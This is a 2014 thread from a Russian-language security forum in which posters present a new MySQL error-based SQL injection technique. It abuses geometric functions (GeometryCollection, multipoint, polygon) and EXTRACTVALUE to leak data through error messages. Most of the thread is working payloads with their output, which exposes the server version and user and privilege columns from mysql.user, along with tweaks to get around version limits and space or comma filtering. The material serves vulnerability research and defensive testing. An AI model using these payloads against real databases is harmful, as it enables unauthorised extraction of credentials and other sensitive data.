RDot (https://rdot.org/forum/index.php)
-   Статьи/Articles (https://rdot.org/forum/forumdisplay.php?f=10)
-   -   MySQL: новый Geometric error-based (https://rdot.org/forum/showthread.php?t=3269)

spari 29.09.2014 20:12

MySQL: новый Geometric error-based
я не говорю России, так что я собираюсь объяснить это на английском языке. ;)
earlier today, i got some spare time, and played a little with the function GeometryCollection().
basically, this function constructs geometry collection.
sounds nice. but the interesting part is, we can only use it with adjusted function, like point(x,y).
for example-
PHP код:

mysqlSELECT GeometryCollection(point(53,12)); 

and output-
PHP код:

geometry(4294967295)            |
|??? ??                          |

as we can see, the output is some gibberish.
now lets try it without POINT()-
PHP код:

mysqlSELECT GeometryCollection(53,12);
Error 1367 (22007): Illegal non geometric '53' value found during parsing 

wow, wait, what?
we got an error on our x argument, 53.
GeometryCollection() cant process this, because GeometryCollection() dont know how to recognize x,y.
after i saw that, i thought "why stop here?", maybe i can play with this a little more.
so, as expected (:)) i tried to pull out the version, like that-
PHP код:

mysqlSELECT GeometryCollection(afrom (select version()a)x;
Error 1367 (22007): Illegal non geometric '`x`.`a`'  value found during parsing 

mmm.. only possible to see the alias. not good enough.
but wait, if we can see the alias, so maybe NAME_CONST() will do the trick?
well, no. theoretically yes, but the problem is we cant call it.
from here, the way to exploitation was really short-
PHP код:

mysql>SELECT GeometryCollection((select*from(select*from(select@@version)f)x));
Error 1367 (22007): Illegal non geometric '(select `x`.`@@version` from (select '5.5.38-35.2' AS `@@version` from dual) `x`)' value found during parsing 

and we get a short, new error based, without spaces and commas.
lets try pull out more stuff, maybe some columns from mysql.user-
PHP код:

mysql>SELECT GeometryCollection((select*from(select*from(select group_concat(user,file_privfrom mysql.user)f)x));
Error 1367 (22007): Illegal non geometric '(select `x`.`group_concat(user,file_priv)` from (select 'localhostY,rootY' AS `group_concat(user,file_priv)` from dual) `x`)' value found during parsing 

hope i expand your mind ;), comments will be nice.

spari 29.09.2014 20:30

other functions that works, than GeometryCollection()-
linestring(), multipoint(), multilinestring() and multipolygon().
PHP код:

mysql>SELECT multipoint((select*from(select*from(select@@version)f)x));
Error 1367 (22007): Illegal non geometric '(select `x`.`@@version` from (select '5.5.38-35.2' AS `@@version` from dual) `x`)' value found during parsing 

BlackFan 30.09.2014 07:22

Копался в исходниках по поводу этого вектора, нашел еще один убогий и неюзабельный)
Из плюсов относительного обычного "XPATH error" - чуть большая длина полезных данных (48 против 31).
Так, чисто в образовательных целях)


SELECT EXTRACTVALUE(0,CONCAT(hex(hex(version())),repeat(0,500),'.'));

ERROR 1367 (22007): Illegal double '333532453335324533323335000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000' value found during parsing

SELECT UNHEX(UNHEX(333532453335324533323335));


PS: Для "non geometric" функция polygon() удобнее

spari 30.09.2014 10:23

narrowing down a bit-
since name_const() allow us to give a numeric alias, we can use this simple trick-
PHP код:

mysql>SELECT polygon((select*from(select name_const(version(),1))x));
Error 1367 (22007): Illegal non geometric '(select `x`.`5.5.38-35.2` from (select NAME_CONST(version(),1) AS `5.5.38-35.2`) `x`)' value found during parsing 

BlackFan 01.10.2014 12:02

На mysql 5.6.20 не срабатывает двойной select*from :(
А name_const не прокатит для обычных запросов


SELECT GeometryCollection((select*from(select*from(select@@version)f)x));

ERROR 1367 (22007): Illegal non geometric '(select `x`.`@@version` from (select
`f`.`@@version` AS `@@version` from (select @@version AS `@@version`) `f`) `x`)'
 value found during parsing

Часовой пояс GMT +3, время: 20:31.

Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2019, Jelsoft Enterprises Ltd. Перевод: zCarot